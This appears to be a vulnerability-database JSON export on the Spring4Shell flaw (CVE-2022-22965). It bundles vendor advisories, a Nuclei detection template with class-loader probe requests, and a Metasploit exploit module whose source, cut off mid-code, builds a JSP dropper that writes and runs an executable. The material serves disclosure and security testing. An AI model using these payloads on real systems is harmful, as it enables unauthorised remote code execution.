"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T10:26:10", "type": "talosblog", "title": "Threat Advisory: Spring4Shell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T10:26:10", "id": "TALOSBLOG:3587BB077717B0512A9D0EFCCBE8770B", "href": "http://blog.talosintelligence.com/2022/03/threat-advisory-spring4shell.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-12-03T15:39:42", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.9.4 serves as a replacement for Red Hat AMQ Broker 7.9.3, and includes security and bug fixes, and enhancements. 
For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:16", "type": "redhat", "title": "(RHSA-2022:1627) Low: Red Hat AMQ Broker 7.9.4 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:46", "id": "RHSA-2022:1627", "href": "https://access.redhat.com/errata/RHSA-2022:1627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. 
\n\nThis release of Red Hat AMQ Broker 7.8.6 serves as a replacement for Red Hat AMQ Broker 7.8.5, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:11", "type": "redhat", "title": "(RHSA-2022:1626) Low: Red Hat AMQ Broker 7.8.6 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:24", "id": "RHSA-2022:1626", "href": "https://access.redhat.com/errata/RHSA-2022:1626", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "Red Hat Integration - Camel Extensions for Quarkus 2.2.1-1 serves as a replacement for 2.2.1 and 
includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T14:02:32", "type": "redhat", "title": "(RHSA-2022:1306) Low: Red Hat Integration Camel Extensions for Quarkus 2.2.1-1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T14:02:57", "id": "RHSA-2022:1306", "href": "https://access.redhat.com/errata/RHSA-2022:1306", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis 
asynchronous security patch is an update to Red Hat Process Automation Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:05:38", "type": "redhat", "title": "(RHSA-2022:1378) Low: Red Hat Process Automation Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:06:00", "id": "RHSA-2022:1378", "href": "https://access.redhat.com/errata/RHSA-2022:1378", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "This release of Red Hat Fuse 7.10.2 serves as a replacement for Red Hat Fuse 7.10.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* spring-webmvc: 
spring-framework: RCE via Data Binding on JDK 9+ [fuse-7] (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T14:42:27", "type": "redhat", "title": "(RHSA-2022:1360) Low: Red Hat Fuse 7.10.2 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T14:42:43", "id": "RHSA-2022:1360", "href": "https://access.redhat.com/errata/RHSA-2022:1360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "A micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section.\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the 
impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:28:41", "type": "redhat", "title": "(RHSA-2022:1333) Low: Red Hat Integration Camel-K 1.6.5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T18:29:00", "id": "RHSA-2022:1333", "href": "https://access.redhat.com/errata/RHSA-2022:1333", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and business optimization for solving planning problems. It automates business decisions and makes that logic available to the entire business. 
\n\nThis asynchronous security patch is an update to Red Hat Decision Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:29:33", "type": "redhat", "title": "(RHSA-2022:1379) Low: Red Hat Decision Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:29:56", "id": "RHSA-2022:1379", "href": "https://access.redhat.com/errata/RHSA-2022:1379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-05T08:59:00", "description": "\n Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. 
An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "nuclei", "title": "Spring - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-23T00:00:00", "id": "NUCLEI:CVE-2022-22965", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2022/CVE-2022-22965.yaml", "sourceData": "id: CVE-2022-22965\n\ninfo:\n name: Spring - Remote Code Execution\n author: justmumu,arall,dhiyaneshDK,akincibor\n severity: critical\n description: |\n Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. 
An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.\n reference:\n - https://tanzu.vmware.com/security/cve-2022-22965\n - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/\n - https://twitter.com/RandoriAttack/status/1509298490106593283\n - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw\n - https://twitter.com/_0xf4n9x_/status/1509935429365100546\n - https://nvd.nist.gov/vuln/detail/cve-2022-22965\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22965\n cwe-id: CWE-94\n epss-score: 0.97451\n epss-percentile: 0.99946\n cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: vmware\n product: spring_framework\n tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}} HTTP/1.1\n Content-Type: application/x-www-form-urlencoded\n\n class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n - |\n GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n\n payloads:\n interact_protocol:\n - \"http\"\n - https\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n case-insensitive: true\n\n# digest: 
490a0046304402207d1214cb3731202032faa78c28cfff30fd3b6a03e480a276427dd5ce5a4ee534022053c87126afe4da15d0c7ac618f90c53032a6bdddece680915da7f30f5bbe40e9:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-05T13:41:19", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be\nvulnerable to remote code execution (RCE) via data binding. The specific\nexploit requires the application to run on Tomcat as a WAR deployment. If\nthe application is deployed as a Spring Boot executable jar, i.e. the\ndefault, it is not vulnerable to the exploit. However, the nature of the\nvulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "UB:CVE-2022-22965", "href": "https://ubuntu.com/security/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], 
"checkpoint_advisories": [{"lastseen": "2022-04-08T19:29:06", "description": "A remote code execution vulnerability exists in Spring Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Core Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CPAI-2022-0104", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T15:43:11", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. 
By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.\n", "cvss3": {}, "published": "2022-04-07T13:22:18", "type": "metasploit", "title": "Spring Framework Class property RCE (Spring4Shell)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T13:16:01", "id": "MSF:EXPLOIT-MULTI-HTTP-SPRING_FRAMEWORK_RCE_SPRING4SHELL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_framework_rce_spring4shell/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Retry\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. 
By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page 
import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_truthy(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n 
else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 
